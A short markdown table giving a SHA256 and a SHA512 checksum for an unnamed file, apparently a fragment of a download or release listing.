| SHA256 | ee7272ef1e09b2c9fcfe4a88a35468977c8c7c6048b13bc292f0f70350ca15b6 |
| SHA512 | 1e398c25e01a43757f902a37a5342c99e73865a22f21a2feb62f6ce2d6eb6def14672a386f61537c9779d26fa6af4cc06478d042301303aea6c9cb0faeb83ea5 |